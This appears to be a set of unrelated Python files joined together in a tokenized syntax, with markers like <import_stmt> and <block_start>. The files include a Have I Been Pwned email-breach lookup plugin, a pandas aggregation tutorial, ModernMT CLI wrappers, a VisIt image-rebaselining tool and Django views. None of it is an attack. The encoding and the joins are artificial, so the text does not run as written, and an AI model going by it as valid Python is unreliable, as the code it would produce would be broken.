<block_end><else_stmt><block_start>albedo_batch=<none><block_end><block_end># dbg: return and show last diff_mean in batch 
<return>depth_raw_batch depth_ref_batch color_batch mask_batch albedo_batch diff_mean<block_end><block_end>
<import_stmt>time<import_stmt>requests<import_from_stmt>core.utils.parser Parser<import_from_stmt>core.utils.helpers Helpers<import_from_stmt>core.models.plugin BasePlugin<class_stmt>HIBP(BasePlugin)<block_start><def_stmt>__init__ self args<block_start>self.args=args<line_sep>self.base_url="https://haveibeenpwned.com/api/v2/breachedaccount"<line_sep>self.url_parameters="truncateResponse=true&includeUnverified=true"<block_end><def_stmt>execute self data<block_start>Helpers.print_warning("Starting Have I Been Pwned plugin..." jumpline=<true>)<line_sep>all_emails=Parser(self.args).all_unique_emails(data)<if_stmt>all_emails<block_start>self.check_all_emails(all_emails)<line_sep><return><true><block_end><return><false><block_end><def_stmt>check_authors self authors<block_start><for_stmt>author authors<block_start>time.sleep(2)<line_sep>self.check_email(author.email)<block_end><block_end><def_stmt>check_all_emails self emails<block_start><for_stmt>email emails<block_start>time.sleep(2)<line_sep>self.check_email(email)<block_end><block_end><def_stmt>check_email self email<block_start><try_stmt><block_start>url="{}/{}?{}".format(self.base_url email self.url_parameters)<line_sep>r=requests.get(url)<if_stmt>r.status_code<eq>503<block_start>Helpers.print_error("hibp: IP got in DDoS protection by CloudFare")<block_end><elif_stmt>r.status_code<eq>429<block_start>Helpers.print_error("hibp: Throttled by HIBP API")<block_end><elif_stmt>r.text<block_start>r=r.json()<line_sep>print("\n{} leaks:".format(email))<for_stmt>leak r<block_start>print("\t- {}".format(leak["Name"]))<block_end><return><true><block_end><return><false><block_end><except_stmt>Exception<as>e<block_start>Helpers.print_error(e)<line_sep><return><false><block_end><block_end><block_end>
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ML METADATA Data Validation external dependencies that can be loaded in WORKSPACE files. """<line_sep>load("//ml_metadata:mysql_configure.bzl" "mysql_configure")<def_stmt>ml_metadata_workspace <block_start>"""All ML Metadata external dependencies."""<line_sep>mysql_configure()<block_end>
<import_stmt>pandas<as>pd<import_stmt>numpy<as>np<line_sep>print(pd.__version__)<line_sep># 1.0.0 print(pd.DataFrame.agg<is>pd.DataFrame.aggregate)<line_sep># True df=pd.DataFrame({'A':[0 1 2] 'B':[3 4 5]})<line_sep>print(df)<line_sep># A B # 0 0 3 # 1 1 4 # 2 2 5 print(df.agg(['sum' 'mean' 'min' 'max']))<line_sep># A B # sum 3.0 12.0 # mean 1.0 4.0 # min 0.0 3.0 # max 2.0 5.0 print(type(df.agg(['sum' 'mean' 'min' 'max'])))<line_sep># <class 'pandas.core.frame.DataFrame'> print(df.agg(['sum']))<line_sep># A B # sum 3 12 print(type(df.agg(['sum'])))<line_sep># <class 'pandas.core.frame.DataFrame'> print(df.agg('sum'))<line_sep># A 3 # B 12 # dtype: int64 print(type(df.agg('sum')))<line_sep># <class 'pandas.core.series.Series'> print(df.agg({'A':['sum' 'min' 'max'] 'B':['mean' 'min' 'max']}))<line_sep># A B # max 2.0 5.0 # mean NaN 4.0 # min 0.0 3.0 # sum 3.0 NaN print(df.agg({'A':'sum' 'B':'mean'}))<line_sep># A 3.0 # B 4.0 # dtype: float64 print(df.agg({'A':['sum'] 'B':['mean']}))<line_sep># A B # mean NaN 4.0 # sum 3.0 NaN print(df.agg({'A':['min' 'max'] 'B':'mean'}))<line_sep># A B # max 2.0 NaN # mean NaN 4.0 # min 0.0 NaN print(df.agg(['sum' 'mean' 'min' 'max'] axis=1))<line_sep># sum mean min max # 0 3.0 1.5 0.0 3.0 # 1 5.0 2.5 1.0 4.0 # 2 7.0 3.5 2.0 5.0 s=df['A']<line_sep>print(s)<line_sep># 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(s.agg(['sum' 'mean' 'min' 'max']))<line_sep># sum 3.0 # mean 1.0 # min 0.0 # max 2.0 # Name: A, dtype: float64 print(type(s.agg(['sum' 'mean' 'min' 'max'])))<line_sep># <class 'pandas.core.series.Series'> print(s.agg(['sum']))<line_sep># sum 3 # Name: A, dtype: int64 print(type(s.agg(['sum'])))<line_sep># <class 'pandas.core.series.Series'> print(s.agg('sum'))<line_sep># 3 print(type(s.agg('sum')))<line_sep># <class 'numpy.int64'> print(s.agg({'Total':'sum' 'Average':'mean' 'Min':'min' 'Max':'max'}))<line_sep># Total 3.0 # Average 1.0 # Min 0.0 # Max 2.0 # Name: A, dtype: float64 # print(s.agg({'NewLabel_1': ['sum', 'max'], 
'NewLabel_2': ['mean', 'min']})) # SpecificationError: nested renamer is not supported print(df.agg(['mad' 'amax' 'dtype']))<line_sep># A B # mad 0.666667 0.666667 # amax 2 5 # dtype int64 int64 print(df['A'].mad())<line_sep># 0.6666666666666666 print(np.amax(df['A']))<line_sep># 2 print(df['A'].dtype)<line_sep># int64 # print(df.agg(['xxx'])) # AttributeError: 'xxx' is not a valid function for 'Series' object # print(df.agg('xxx')) # AttributeError: 'xxx' is not a valid function for 'DataFrame' object print(hasattr(pd.DataFrame '__array__'))<line_sep># True print(hasattr(pd.core.groupby.GroupBy '__array__'))<line_sep># False print(df.agg([np.sum max]))<line_sep># A B # sum 3 12 # max 2 5 print(np.sum(df['A']))<line_sep># 3 print(max(df['A']))<line_sep># 2 print(np.abs(df['A']))<line_sep># 0 0 # 1 1 # 2 2 # Name: A, dtype: int64 print(df.agg([np.abs]))<line_sep># A B # absolute absolute # 0 0 3 # 1 1 4 # 2 2 5 # print(df.agg([np.abs, max])) # ValueError: cannot combine transform and aggregation operations <def_stmt>my_func x<block_start><return>min(x)/max(x)<block_end>print(df.agg([my_func <lambda>x:min(x)/max(x)]))<line_sep># A B # my_func 0.0 0.6 # <lambda> 0.0 0.6 print(df['A'].std())<line_sep># 1.0 print(df['A'].std(ddof=0))<line_sep># 0.816496580927726 print(df.agg(['std' <lambda>x:x.std(ddof=0)]))<line_sep># A B # std 1.000000 1.000000 # <lambda> 0.816497 0.816497 print(df.agg('std' ddof=0))<line_sep># A 0.816497 # B 0.816497 # dtype: float64 print(df.agg(['std'] ddof=0))<line_sep># A B # std 1.0 1.0 df_str=df.assign(C=['X' 'Y' 'Z'])<line_sep>print(df_str)<line_sep># A B C # 0 0 3 X # 1 1 4 Y # 2 2 5 Z # df_str['C'].mean() # TypeError: Could not convert XYZ to numeric print(df_str.agg(['sum' 'mean']))<line_sep># A B C # sum 3.0 12.0 XYZ # mean 1.0 4.0 NaN print(df_str.agg(['mean' 'std']))<line_sep># A B # mean 1.0 4.0 # std 1.0 1.0 print(df_str.agg(['sum' 'min' 'max']))<line_sep># A B C # sum 3 12 XYZ # min 0 3 X # max 2 5 Z 
print(df_str.select_dtypes(include='number').agg(['sum' 'mean']))<line_sep># A B # sum 3.0 12.0 # mean 1.0 4.0
<import_stmt>os<import_stmt>re<import_from_stmt>cli.mmt MMT_HOME_DIR MMT_LIB_DIR MMT_BIN_DIR MMT_JAR MMT_PLUGINS_JARS<import_from_stmt>cli.utils osutils<def_stmt>__get_java_version <block_start><try_stmt><block_start>stdout,stderr=osutils.shell_exec(['java' '-version'])<line_sep>java_output=stdout+'\n'+stderr<for_stmt>line java_output.split('\n')<block_start>tokens=line.split()<if_stmt>'version'<in>tokens<block_start>version=tokens[tokens.index('version')+1]<line_sep>version=version.strip('"')<if_stmt>version.startswith('1.')<block_start>version=version[2:]<block_end>version=re.match('^[0-9]+' version)<line_sep><return>int(version.group())<block_end><block_end><return><none><block_end><except_stmt>OSError<block_start><return><none><block_end><block_end>__java_version=__get_java_version()<assert_stmt>__java_version<is><not><none> 'missing Java executable, please check INSTALL.md'<assert_stmt>__java_version<g>7 'wrong version of Java: required Java 8 or higher'<def_stmt>mmt_env <block_start>llp=(MMT_LIB_DIR+os.pathsep+os.environ['LD_LIBRARY_PATH'])<if>'LD_LIBRARY_PATH'<in>os.environ<else>MMT_LIB_DIR<line_sep><return>dict(os.environ LD_LIBRARY_PATH=llp LC_ALL='C.UTF-8' LANG='C.UTF-8')<block_end><if_stmt>'MMT_HOME'<not><in>os.environ<block_start>os.environ['MMT_HOME']=MMT_HOME_DIR<block_end># - ModernMT CLI functions --------------------------------------------------------------------------------------------- <def_stmt>mmt_java main_class args=<none> * java_ops=<none> remote_debug=<false> max_heap_mb=<none> server=<false> 
logs_path=<none><block_start>java_ops=java_ops<or>[]<if_stmt>remote_debug<block_start>java_ops.append('-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005')<block_end><if_stmt>server<block_start>java_ops.append('-server')<if_stmt>max_heap_mb<is><not><none><block_start>java_ops.append('-Xms'+str(max_heap_mb)+'m')<line_sep>java_ops.append('-Xmx'+str(max_heap_mb)+'m')<block_end><if_stmt>logs_path<is><not><none><block_start>java_ops<augadd>['-XX:ErrorFile='+os.path.join(logs_path 'hs_err_pid%p.log')]<line_sep>java_ops<augadd>['-XX:+PrintGCDateStamps' '-verbose:gc' '-XX:+PrintGCDetails' '-Xloggc:'+os.path.join(logs_path 'gc.log')]<line_sep>java_ops<augadd>['-XX:+HeapDumpOnOutOfMemoryError' '-XX:HeapDumpPath='+logs_path]<block_end>java_ops<augadd>['-XX:+CMSClassUnloadingEnabled' '-XX:+UseConcMarkSweepGC' '-XX:+CMSParallelRemarkEnabled' '-XX:+UseCMSInitiatingOccupancyOnly' '-XX:CMSInitiatingOccupancyFraction=70' '-XX:+ScavengeBeforeFullGC' '-XX:+CMSScavengeBeforeRemark' '-XX:+CMSClassUnloadingEnabled' '-XX:+ExplicitGCInvokesConcurrentAndUnloadsClasses']<block_end><else_stmt><block_start><if_stmt>max_heap_mb<is><not><none><block_start>java_ops.append('-Xmx'+str(max_heap_mb)+'m')<block_end><block_end>classpath=':'.join([MMT_JAR]+MMT_PLUGINS_JARS)<line_sep>java_cmd=['java']+java_ops+['-cp' classpath '-Dmmt.home='+MMT_HOME_DIR '-Djava.library.path='+MMT_LIB_DIR main_class]<if_stmt>args<is><not><none><block_start>java_cmd<augadd>args<block_end><return>java_cmd<block_end><def_stmt>mmt_tmsclean src_lang tgt_lang in_path out_path out_format=<none> filters=<none><block_start>args=['-s' src_lang '-t' tgt_lang '--input' in_path '--output' out_path]<if_stmt>out_format<is><not><none><block_start>args<augadd>['--output-format' out_format]<block_end><if_stmt>filters<is><not><none><and>len(filters)<g>0<block_start>args<augadd>['--filters']+filters<block_end>extended_heap_mb=int(osutils.mem_size()<times>90/100)<line_sep>java_ops=['-DentityExpansionLimit=0' 
'-DtotalEntitySizeLimit=0' '-Djdk.xml.totalEntitySizeLimit=0']<line_sep>command=mmt_java('eu.modernmt.cli.CleaningPipelineMain' args max_heap_mb=extended_heap_mb java_ops=java_ops)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end><def_stmt>mmt_preprocess src_lang tgt_lang in_paths out_path dev_path=<none> test_path=<none> partition_size=<none> quiet=<false><block_start>args=['-s' src_lang '-t' tgt_lang '--output' out_path '--input']<if_stmt>isinstance(in_paths str)<block_start>in_paths=[in_paths]<block_end>args<augadd>in_paths<if_stmt>partition_size<is><not><none><block_start>args<augadd>['--size' str(partition_size)]<block_end><if_stmt>dev_path<is><not><none><block_start>args<augadd>['--dev' dev_path]<block_end><if_stmt>test_path<is><not><none><block_start>args<augadd>['--test' test_path]<block_end><if_stmt>quiet<block_start>args.append('--quiet')<block_end>command=mmt_java('eu.modernmt.cli.TrainingPipelineMain' args)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end><def_stmt>mmt_dedup src_lang tgt_lang in_path out_path length_threshold=<none> sort=<none><block_start>args=['-s' src_lang '-t' tgt_lang '--input' in_path '--output' out_path]<if_stmt>length_threshold<is><not><none><and>length_threshold<g>0<block_start>args<augadd>['-l' length_threshold]<block_end><if_stmt>sort<is><not><none><block_start>args<augadd>['--sort']+sort<block_end>command=mmt_java('eu.modernmt.cli.DeduplicationMain' args)<line_sep>osutils.shell_exec(command env=mmt_env())<block_end># - Fastalign CLI functions -------------------------------------------------------------------------------------------- <def_stmt>fastalign_build src_lang tgt_lang in_path out_model iterations=<none> case_sensitive=<true> favor_diagonal=<true> log=<none><block_start>os.makedirs(out_model exist_ok=<true>)<line_sep>out_model=os.path.join(out_model '%s__%s.fam'%(src_lang tgt_lang))<if_stmt>log<is><none><block_start>log=osutils.DEVNULL<block_end>command=[os.path.join(MMT_BIN_DIR 'fa_build') 
'-s' src_lang '-t' tgt_lang '-i' in_path '-m' out_model]<if_stmt>iterations<is><not><none><block_start>command.extend(['-I' str(iterations)])<block_end><if_stmt><not>case_sensitive<block_start>command.append('--case-insensitive')<block_end><if_stmt><not>favor_diagonal<block_start>command.append('--no-favor-diagonal')<block_end>osutils.shell_exec(command stdout=log stderr=log env=mmt_env())<block_end><def_stmt>fastalign_score src_lang tgt_lang model_path in_path out_path=<none><block_start>model_path=os.path.join(model_path '%s__%s.fam'%(src_lang tgt_lang))<line_sep>command=[os.path.join(MMT_BIN_DIR 'fa_score') '-s' src_lang '-t' tgt_lang '-m' model_path '-i' in_path '-o' out_path<or>in_path]<line_sep>stdout,_=osutils.shell_exec(command env=mmt_env())<line_sep>result=dict()<for_stmt>line stdout.splitlines(keepends=<false>)<block_start>key,value=line.split('=' maxsplit=1)<line_sep>result[key]=float(value)<block_end><return>result['good_avg'] result['good_std_dev'] result['bad_avg'] result['bad_std_dev']<block_end>
<import_from_stmt>enum Enum<class_stmt>TradeStatus(Enum)<block_start>PENDING_ACCEPT=0<line_sep>PENDING_CONFIRM=1<line_sep>PENDING_CANCEL=2<line_sep>CANCELED=3<line_sep>CONFIRMED=4<line_sep>FAILED=5<block_end>
<import_stmt>filecmp<import_stmt>os<import_stmt>sys<import_stmt>shutil<import_stmt>subprocess<import_stmt>time<import_stmt>unittest<if_stmt>(sys.version_info<g>(3 0))<block_start><import_stmt>urllib.request urllib.parse urllib.error<block_end><else_stmt><block_start><import_stmt>urllib<block_end><import_from_stmt>optparse OptionParser<import_from_stmt>PyQt4 QtCore QtGui<line_sep>parser=OptionParser()<line_sep>parser.add_option("-r" "--root" dest="web_root" default="http://portal.nersc.gov/project/visit/" help="Root of web URL where baselines are")<line_sep>parser.add_option("-d" "--date" dest="web_date" help="Date of last good run, in YYMonDD form")<line_sep>parser.add_option("-m" "--mode" dest="mode" help="Mode to run in: serial, parallel, sr")<line_sep>parser.add_option("-w" "--web-url" dest="web_url" help="Manual URL specification; normally generated "<concat>"automatically based on (-r, -d, -m)")<line_sep>parser.add_option("-g" "--git" dest="git" action="store_true" help="Use git to ignore images with local modifications")<line_sep>parser.add_option("-s" "--svn" dest="svn" action="store_true" help="Use svn to ignore images with local modifications")<line_sep>(options args)=parser.parse_args()<if_stmt>options.web_url<is><not><none><block_start>uri=options.web_url<block_end><else_stmt><block_start>uri=options.web_root+options.web_date+"/"<line_sep>mode=""<if_stmt>options.mode<eq>"sr"<or>options.mode<eq>"scalable,parallel"<or>options.mode<eq>"scalable_parallel"<block_start>mode="davinci_scalable_parallel_icet"<block_end><else_stmt><block_start>mode="".join([s<for>s ("davinci_" options.mode)])<block_end>uri<augadd>mode+"/"<block_end>parser.destroy()<line_sep>print("uri:" uri)<class_stmt>MW(QtGui.QMainWindow)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QMainWindow.__init__(self parent)<block_end><block_end><def_stmt>real_dirname path<block_start>"""Python's os.path.dirname is not dirname."""<line_sep><return>path.rsplit('/' 
1)[0]<block_end><def_stmt>real_basename path<block_start>"""Python's os.path.basename is not basename."""<if_stmt>path.rsplit('/' 1)[1]<is>''<block_start><return><none><block_end><return>path.rsplit('/' 1)[1]<block_end><def_stmt>baseline_current serial_baseline<block_start>"""Given the path to the serial baseline image, determine if there is a mode specific baseline. Return a 2-tuple of the baseline image and the path to the 'current' image."""<line_sep>dname=real_dirname(serial_baseline)<line_sep>bname=real_basename(serial_baseline)<line_sep>baseline=serial_baseline<if_stmt>options.mode<is><not><none># Check for a mode specific baseline. <block_start>mode_spec=os.path.join(dname+"/" options.mode+"/" bname)<if_stmt>os.path.exists(mode_spec)<block_start>baseline=mode_spec<block_end><block_end># `Current' image never has a mode-specific path; filename/dir is always # based on the serial baseline's directory. no_baseline=serial_baseline.split('/' 1)# path without "baseline/" current=os.path.join("current/" no_baseline[1])<line_sep><return>(baseline current)<block_end><def_stmt>mode_specific baseline<block_start>"""Given a baseline image path, return a path to the mode specific baseline, even if said baseline does not exist (yet)."""<if_stmt>options.mode<is><none><or>options.mode<eq>"serial"<block_start><return>baseline<block_end>dname=real_dirname(baseline)<line_sep>bname=real_basename(baseline)<if_stmt>options.mode<eq>"parallel"<block_start><if_stmt>baseline.find("/parallel")<ne>-1# It's already got parallel in the path; this IS a mode specific # baseline. <block_start><return>baseline<block_end><return>os.path.join(dname options.mode bname)<block_end><if_stmt>options.mode.find("scalable")<ne>-1<block_start><if_stmt>baseline.find("scalable_parallel")<ne>-1# Already is mode-specific. <block_start><return>baseline<block_end><return>os.path.join(dname "scalable_parallel" bname)<block_end># Ruh roh. options.mode must be garbage. 
<raise>NotImplementedError("Unknown mode '%s'"%options.mode)<block_end><def_stmt>local_modifications_git file<block_start>vcs_diff=subprocess.call(["git" "diff" "--quiet" file])<if_stmt>vcs_diff<eq>1<block_start><return><true><block_end><return><false><block_end><def_stmt>local_modifications_svn file<block_start>svnstat=subprocess.Popen("svn stat %s"%file shell=<true> stdout=subprocess.PIPE)<line_sep>diff=svnstat.communicate()[0]<if_stmt>diff<ne>''<block_start><return><true><block_end><return><false><block_end><def_stmt>local_modifications filepath<block_start>"""Returns true if the file has local modifications. Always false if the user did not supply the appropriate VCS option."""<if_stmt>options.git<block_start><return>local_modifications_git(filepath)<block_end><if_stmt>options.svn<block_start><return>local_modifications_svn(filepath)<block_end><return><false><block_end><def_stmt>equivalent baseline image<block_start>"""True if the files are the same."""<if_stmt><not>os.path.exists(image)<block_start><return><false><block_end># Note this is `shallow' by default, but that's fine for our usage. 
<return>filecmp.cmp(baseline image)<block_end><def_stmt>trivial_pass baseline image<block_start>"""True if we can determine that this image is OK without querying the network."""<line_sep><return>equivalent(baseline image)<or>local_modifications(baseline)<block_end><class_stmt>RebaselinePTests(unittest.TestCase)<block_start><def_stmt>test_dirname self<block_start>input_and_results=[("baseline/category/test/a.png" "baseline/category/test") ("b/c/t/q.png" "b/c/t") ("b/c/t/longfn.png" "b/c/t") ("b/c/t/" "b/c/t")]<for_stmt>tst input_and_results<block_start>self.assertEqual(real_dirname(tst[0]) tst[1])<block_end><block_end><def_stmt>test_basename self<block_start>input_and_results=[("baseline/category/test/a.png" "a.png") ("b/c/t/q.png" "q.png") ("b/c/t/longfn.png" "longfn.png") ("b/c/t/" <none>)]<for_stmt>tst input_and_results<block_start>self.assertEqual(real_basename(tst[0]) tst[1])<block_end><block_end><block_end><class_stmt>Image(QtGui.QWidget)<block_start><def_stmt>__init__ self path parent=<none><block_start>self._filename=path<line_sep>self._parent=parent<line_sep>self._display=QtGui.QLabel(self._parent)<line_sep>self._load()<block_end><def_stmt>_load self<block_start>pixmap=QtGui.QPixmap(300 300)<line_sep>pixmap.load(self._filename)<line_sep>self._display.resize(pixmap.size())<line_sep>self._display.setPixmap(pixmap)<block_end><def_stmt>widget self<block_start><return>self._display<block_end><def_stmt>width self<block_start><return>self._display.width()<block_end><def_stmt>height self<block_start><return>self._display.height()<block_end><def_stmt>update self path<block_start>self._filename=path<line_sep>self._load()<block_end><block_end><class_stmt>Layout(QtGui.QWidget)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QWidget.__init__(self parent)<line_sep>self._mainwin=parent<line_sep>self._mainwin.statusBar().insertPermanentWidget(0 QtGui.QLabel())<line_sep>self.status("Initializing...")<line_sep>quit=QtGui.QPushButton('Quit' 
self)<line_sep>quit.setMaximumWidth(80)<if_stmt>parent<is><none><block_start>parent=self<block_end>parent.connect(quit QtCore.SIGNAL('clicked()') QtGui.qApp QtCore.SLOT('quit()'))<line_sep>parent.connect(self QtCore.SIGNAL('closeApp()') self._die)<line_sep>self._init_signals()<line_sep>self._bugs=[]# list which keeps track of which images we think are bugs. # guess an initial size; we don't know a real size until we've downloaded # images. self.resize_this_and_mainwin(600 600)<line_sep>self.setFocusPolicy(QtCore.Qt.StrongFocus)<line_sep>self.setFocus()<line_sep>self._baseline=<none><line_sep>self._current=<none><line_sep>self._diff=<none><line_sep>self._images=[<none> <none> <none>]<line_sep>self._next_set_of_images()<line_sep>self._images[0]=Image(self._baseline self)<line_sep>self._images[1]=Image(self._current self)<line_sep>self._images[2]=Image(self._diff self)<line_sep>grid=QtGui.QGridLayout()<line_sep>label_baseline=QtGui.QLabel(grid.widget())<line_sep>label_current=QtGui.QLabel(grid.widget())<line_sep>label_diff=QtGui.QLabel(grid.widget())<line_sep>label_baseline.setText("Baseline image:")<line_sep>label_current.setText("Davinci's current:")<line_sep>label_diff.setText("difference between them:")<line_sep>label_baseline.setMaximumSize(QtCore.QSize(160 35))<line_sep>label_current.setMaximumSize(QtCore.QSize(160 35))<line_sep>label_diff.setMaximumSize(QtCore.QSize(200 35))<line_sep>label_directions=QtGui.QLabel(grid.widget())<line_sep>label_directions.setText("Keyboard shorcuts:\n\n"<concat>"y: yes, rebaseline\n"<concat>"n: no, current image is wrong\n"<concat>"u: unknown, I can't/don't want to decide now\n"<concat>"q: quit")<line_sep>label_directions.setMaximumSize(QtCore.QSize(300 300))<line_sep>grid.addWidget(label_baseline 0 0)<line_sep>grid.addWidget(label_current 0 1)<line_sep>grid.addWidget(self._images[0].widget() 1 0)<line_sep>grid.addWidget(self._images[1].widget() 1 1)<line_sep>grid.addWidget(label_diff 2 0)<line_sep>grid.addWidget(quit 2 
1)<line_sep>grid.addWidget(self._images[2].widget() 3 0)<line_sep>grid.addWidget(label_directions 3 1)<line_sep>rows=((0 (label_baseline label_current)) (1 (self._images[0] self._images[1])) (2 (label_diff quit)) (3 (self._images[2] label_directions)))<line_sep>cols=((0 (label_baseline self._images[0] label_diff self._images[2])) (1 (label_current self._images[1] quit label_directions)))<for_stmt>r rows<block_start>grid.setRowMinimumHeight(r[0] max([x.height()<for>x r[1]]))<block_end><for_stmt>c cols<block_start>grid.setColumnMinimumWidth(c[0] max([x.height()<for>x c[1]]))<block_end>self.setLayout(grid)<line_sep>self.resize_this_and_mainwin(self.calc_width() self.calc_height())<line_sep>self.show()<line_sep>self.setFocus()<block_end><def_stmt>resize_this_and_mainwin self w h<block_start>self.resize(w h)<line_sep># make sure it can't shrink too much self._mainwin.setMinimumWidth(w)<line_sep>self._mainwin.setMinimumHeight(h+30)# +30: for the status bar # try not to resize the mainwin if we don't need to; it's annoying. 
cur_w=self._mainwin.width()<line_sep>cur_h=self._mainwin.height()<line_sep>self._mainwin.resize(max(w cur_w) max(h cur_h))<line_sep>self._mainwin.update()<block_end><def_stmt>_die self<block_start>print("You thought these test results were bugs:")<for_stmt>f self._bugs<block_start>print("\t" f)<block_end>self._mainwin.close()<block_end><def_stmt>calc_width self<block_start>w=0<for_stmt>col range(0 self.layout().columnCount())<block_start>w<augadd>self.layout().columnMinimumWidth(col)<block_end><return>w<block_end><def_stmt>calc_height self<block_start>h=0<for_stmt>row range(0 self.layout().rowCount())<block_start>h<augadd>self.layout().rowMinimumHeight(row)<block_end><return>h<block_end><def_stmt>_update_images self<block_start>self._images[0].update(self._baseline)<line_sep>self._images[1].update(self._current)<line_sep>self._images[2].update(self._diff)<line_sep>self.resize_this_and_mainwin(self.calc_width() self.calc_height())<line_sep>self.update()<block_end><def_stmt>_rebaseline self<block_start>self.status("".join(["rebaselining " self._current "..."]))<line_sep>baseline=mode_specific(self._baseline)<line_sep>print("moving" self._current "on top of" baseline)<line_sep># We might be creating the first mode specific baseline for that test. If # so, it'll be missing the baseline specific dir. <if_stmt><not>os.path.exists(real_dirname(baseline))<block_start>print(real_dirname(baseline) "does not exist, creating...")<line_sep>os.mkdir(real_dirname(baseline))<block_end>shutil.move(self._current baseline)# do the rebaseline! 
self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>_ignore self<block_start>self.status("".join(["ignoring " self._baseline "..."]))<line_sep>self._bugs.append(self._baseline)<line_sep>self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>_unknown self<block_start>self.status("".join(["unknown " self._baseline "..."]))<line_sep>self._next_set_of_images()<line_sep>self._update_images()<block_end><def_stmt>status self msg<block_start>self._mainwin.statusBar().showMessage(msg)<line_sep>self._mainwin.statusBar().update()<line_sep>QtCore.QCoreApplication.processEvents()<block_end># we're single threaded <def_stmt>_next_set_of_images self<block_start>"""Figures out the next set of images to display. Downloads 'current' and 'diff' results from davinci. Sets filenames corresponding to baseline, current and diff images."""<if_stmt>self._baseline<is><none># first call, build list. <block_start>self._imagelist=[]<line_sep>print("Building initial file list... please wait.")<line_sep>self.status("Building initial file list... please wait.")<for_stmt>root,dirs,files os.walk("baseline")<block_start><for_stmt>f files<block_start>fn,ext=os.path.splitext(f)<if_stmt>ext<eq>".png"# In some cases, we can trivially reject a file. Don't bother # adding it to our list in that case. <block_start>serial_baseline_fn=os.path.join(root f)<line_sep># Does this path contain "parallel" or "scalable_parallel"? Then # we've got a mode specific baseline. We'll handle those based on # the serial filenames, so ignore them for now. 
<if_stmt>serial_baseline_fn.find("parallel")<ne>-1<block_start><continue><block_end>baseline_fn,current_fn=baseline_current(serial_baseline_fn)<assert_stmt>os.path.exists(baseline_fn)<if_stmt><not>trivial_pass(baseline_fn current_fn)<block_start>self._imagelist.append(baseline_fn)<block_end><block_end><block_end><block_end><block_end><try_stmt><block_start><while_stmt>len(self._imagelist)<g>0<block_start>self._baseline=self._imagelist.pop()<line_sep># now derive other filenames based on that one. filename=<none><line_sep># os.path.split fails if there's no / <try_stmt><block_start>filename=os.path.split(self._baseline)<line_sep>filename=filename[1]<block_end><except_stmt>AttributeError<as>e<block_start>self.status("No slash!")<line_sep><break><block_end>current_url=uri+"/c_"+filename<if_stmt>(sys.version_info<g>(3 0))<block_start>f,info=urllib.request.urlretrieve(current_url "local_current.png")<block_end><else_stmt><block_start>f,info=urllib.urlretrieve(current_url "local_current.png")<block_end>self.status("".join(["Checking " current_url "..."]))<if_stmt>info.getheader("Content-Type").startswith("text/html")# then it's a 404 or other error; skip this image. <block_start><continue><block_end><else_stmt># We found the next image. 
<block_start>self._current="local_current.png"<line_sep>diff_url=uri+"/d_"+filename<if_stmt>(sys.version_info<g>(3 0))<block_start>f,info=urllib.request.urlretrieve(diff_url "local_diff.png")<block_end><else_stmt><block_start>f,info=urllib.urlretrieve(diff_url "local_diff.png")<block_end><if_stmt>info.getheader("Content-Type").startswith("text/html")<block_start><raise>Exception("Could not download diff image.")<block_end>self._diff="local_diff.png"<line_sep>self.status("Waiting for input on "+filename)<line_sep><break><block_end><block_end><block_end><except_stmt>KeyError<as>e<block_start>print(e)<line_sep>print("No more images!")<line_sep>self.emit(QtCore.SIGNAL('closeApp()'))<block_end><block_end><def_stmt>_init_signals self<block_start>self.connect(self QtCore.SIGNAL('rebaseline()') self._rebaseline)<line_sep>self.connect(self QtCore.SIGNAL('ignore()') self._ignore)<line_sep>self.connect(self QtCore.SIGNAL('unknown()') self._unknown)<block_end><def_stmt>keyPressEvent self event<block_start><if_stmt>event.key()<eq>QtCore.Qt.Key_Q<block_start>self.emit(QtCore.SIGNAL('closeApp()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_Y<block_start>self.emit(QtCore.SIGNAL('rebaseline()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_N<block_start>self.emit(QtCore.SIGNAL('ignore()'))<block_end><if_stmt>event.key()<eq>QtCore.Qt.Key_U<block_start>self.emit(QtCore.SIGNAL('unknown()'))<block_end>QtCore.QCoreApplication.processEvents()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>suite=unittest.TestLoader().loadTestsFromTestCase(RebaselinePTests)<line_sep>results=unittest.TextTestRunner(verbosity=2).run(suite)<if_stmt><not>results.wasSuccessful()<block_start>print("Tests failed, bailing.")<line_sep>sys.exit(1)<block_end>app=QtGui.QApplication(sys.argv)<line_sep>mw=MW()<line_sep>mw.show()<line_sep>mw.setWindowTitle("visit rebaseline -p")<line_sep>layout=Layout(mw)<line_sep>layout.show()<line_sep>sys.exit(app.exec_())<block_end>
<import_stmt>logging<import_from_stmt>django.apps apps<import_from_stmt>django.contrib.auth.mixins LoginRequiredMixin<import_from_stmt>django.http Http404 HttpResponse JsonResponse<import_from_stmt>django.views.generic TemplateView View<import_from_stmt>zentral.core.stores frontend_store<line_sep>logger=logging.getLogger("server.base.views")<class_stmt>HealthCheckView(View)<block_start><def_stmt>get self request *args **kwargs<block_start><return>HttpResponse('OK')<block_end><block_end><class_stmt>IndexView(LoginRequiredMixin TemplateView)<block_start>template_name="base/index.html"<def_stmt>get_context_data self **kwargs<block_start>context=super(IndexView self).get_context_data(**kwargs)<line_sep>app_list=[]<for_stmt>app_name,app_config apps.app_configs.items()<block_start><if_stmt>getattr(app_config "events_module" <none>)<is><not><none><block_start>app_list.append(app_name)<block_end><block_end>app_list.sort()<line_sep>context["apps"]=app_list<line_sep><return>context<block_end><block_end><class_stmt>AppHistogramDataView(LoginRequiredMixin View)<block_start>INTERVAL_DATE_FORMAT={"hour":"%H:%M" "day":"%d/%m" "week":"%d/%m" "month":"%m/%y" }<def_stmt>get self request *args 